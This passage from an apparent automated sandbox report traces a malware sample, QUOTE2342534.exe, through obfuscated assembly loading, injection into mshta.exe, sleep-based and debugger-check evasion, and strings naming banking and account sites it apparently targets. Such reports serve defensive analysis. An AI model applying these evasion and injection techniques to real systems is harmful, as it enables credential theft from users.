            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\QUOTE2342534.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: QUOTE2342534.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: QUOTE2342534.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: QUOTE2342534.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: mshta.pdbGCTL source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnPyaKsYTE.exe, 00000007.00000000.2154339993.000000000012E000.00000002.00000001.01000000.0000000C.sdmp, qnPyaKsYTE.exe, 0000000A.00000000.2297414318.000000000012E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdbSHA256 source: QUOTE2342534.exe
            Source: Binary string: wntdll.pdb source: QUOTE2342534.exe, QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdb source: QUOTE2342534.exe
            Source: Binary string: mshta.pdb source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: QUOTE2342534.exe, formMain.cs .Net Code: InitializeComponent
            Source: 0.2.QUOTE2342534.exe.38e0b90.0.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.cs .Net Code: uVluVFvwkb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.cs .Net Code: uVluVFvwkb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.QUOTE2342534.exe.7080000.2.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 8.2.mshta.exe.3eecd14.2.raw.unpack, formMain.cs .Net Code: InitializeComponent
            Source: 10.0.qnPyaKsYTE.exe.287cd14.1.raw.unpack, formMain.cs .Net Code: InitializeComponent
            Source: 10.2.qnPyaKsYTE.exe.287cd14.1.raw.unpack, formMain.cs .Net Code: InitializeComponent
            Source: 11.2.firefox.exe.2928cd14.0.raw.unpack, formMain.cs .Net Code: InitializeComponent
            Source: QUOTE2342534.exe Static PE information: 0xD96D0FA5 [Sat Aug 4 22:41:41 2085 UTC]
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_004118F3 push esp; iretd 4_2_00411926
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_004118B0 push esp; iretd 4_2_00411926
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_0041B2EA pushfd ; retf 4_2_0041B2ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_004033D0 push eax; ret 4_2_004033D2
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_0040BCC7 push C1009F53h; ret 4_2_0040BCCE
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_00406567 push edx; iretd 4_2_00406568
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_004165BD pushfd ; retf 4_2_004165C1
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_0040863B push ebx; iretd 4_2_0040863C
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_0041E74B push ds; iretd 4_2_0041E74C
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Code function: 4_2_017209AD push ecx; mov dword ptr [esp], ecx 4_2_017209B6
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Code function: 7_2_04192500 push eax; retf 7_2_0419250A
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Code function: 7_2_04197D71 pushfd ; retf 7_2_04197D74
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Code function: 7_2_0418874E push C1009F53h; ret 7_2_04188755
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Code function: 7_2_04182FEE push edx; iretd 7_2_04182FEF
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Code function: 7_2_04193044 pushfd ; retf 7_2_04193048
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Code function: 7_2_041850C2 push ebx; iretd 7_2_041850C3
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0419B1D2 push ds; iretd 7_2_0419B1D3
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418E337 push esp; iretd 7_2_0418E3AD
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418E37A push esp; iretd 7_2_0418E3AD
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0381225F pushad ; ret 8_2_038127F9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038127FA pushad ; ret 8_2_038127F9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038409AD push ecx; mov dword ptr [esp], ecx8_2_038409B6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0381283D push eax; iretd 8_2_03812858
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03811200 push eax; iretd 8_2_03811369
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2E4DD push esp; iretd 8_2_02F2E553
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2E520 push esp; iretd 8_2_02F2E553
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F288F4 push C1009F53h; ret 8_2_02F288FB
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F408E4 push 9C6AA52Bh; iretd 8_2_02F40948
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F25268 push ebx; iretd 8_2_02F25269
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F3B378 push ds; iretd 8_2_02F3B379
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F331EA pushfd ; retf 8_2_02F331EE
            Source: QUOTE2342534.exeStatic PE information: section name: .text entropy: 7.948843186706725

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: QUOTE2342534.exe PID: 1992, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 48C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 8B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 9B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 9D50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: AD50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: B8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: C8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: D8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E rdtsc 4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5523Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2244Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9783Jump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mshta.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\QUOTE2342534.exe TID: 3148Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep count: 190 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep time: -380000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep count: 9783 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep time: -19566000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe TID: 3480Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe TID: 3480Thread sleep time: -61500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe TID: 3480Thread sleep time: -47000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F3C390 FindFirstFileW,FindNextFileW,FindClose,8_2_02F3C390
            Source: 4-4-J4.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 4-4-J4.8.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 4-4-J4.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 4-4-J4.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 4-4-J4.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 4-4-J4.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 4-4-J4.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 4-4-J4.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 4-4-J4.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: firefox.exe, 0000000B.00000002.2520941156.0000021D292FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
            Source: 4-4-J4.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 4-4-J4.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 4-4-J4.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 4-4-J4.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 4-4-J4.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594205767.000000000094F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 4-4-J4.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 4-4-J4.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 4-4-J4.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004176E3 LdrLoadDll,4_2_004176E3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B8158 mov eax, dword ptr fs:[00000030h]4_2_017B8158
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171826B mov eax, dword ptr fs:[00000030h]4_2_0171826B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A250 mov eax, dword ptr fs:[00000030h]4_2_0171A250
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726259 mov eax, dword ptr fs:[00000030h]4_2_01726259
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA250 mov eax, dword ptr fs:[00000030h]4_2_017DA250
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA250 mov eax, dword ptr fs:[00000030h]4_2_017DA250
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A8243 mov eax, dword ptr fs:[00000030h]4_2_017A8243
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A8243 mov ecx, dword ptr fs:[00000030h]4_2_017A8243
